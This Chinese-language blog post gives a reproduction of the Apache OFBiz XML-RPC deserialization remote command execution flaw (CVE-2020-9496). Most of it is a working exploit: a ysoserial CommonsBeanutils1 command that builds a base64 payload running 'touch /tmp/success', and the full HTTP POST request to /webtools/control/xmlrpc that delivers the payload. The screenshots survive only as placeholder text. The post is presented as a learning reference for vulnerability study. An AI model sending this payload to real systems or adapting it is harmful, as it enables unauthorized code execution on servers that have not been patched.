我是靠谱客的博主 彩色羊,这篇文章主要介绍Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496),现在分享给大家,希望可以做个参考。

漏洞复现

使用ysoserial的CommonsBeanutils1来生成Payload,使用命令生成base64的payload:

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "n"

将base64的payload替换并发送以下数据包:

POST /webtools/control/xmlrpc HTTP/1.1
Host: your-ip
Content-Type: application/xml
Content-Length: 4093

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

在这里插入图片描述
返回靶机查看
在这里插入图片描述

最后

以上就是彩色羊最近收集整理的关于Apache OfBiz 反序列化命令执行漏洞(CVE-2020-9496)的全部内容,更多相关Apache内容请搜索靠谱客的其他文章。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(51)

评论列表共有 0 条评论

立即
投稿
返回
顶部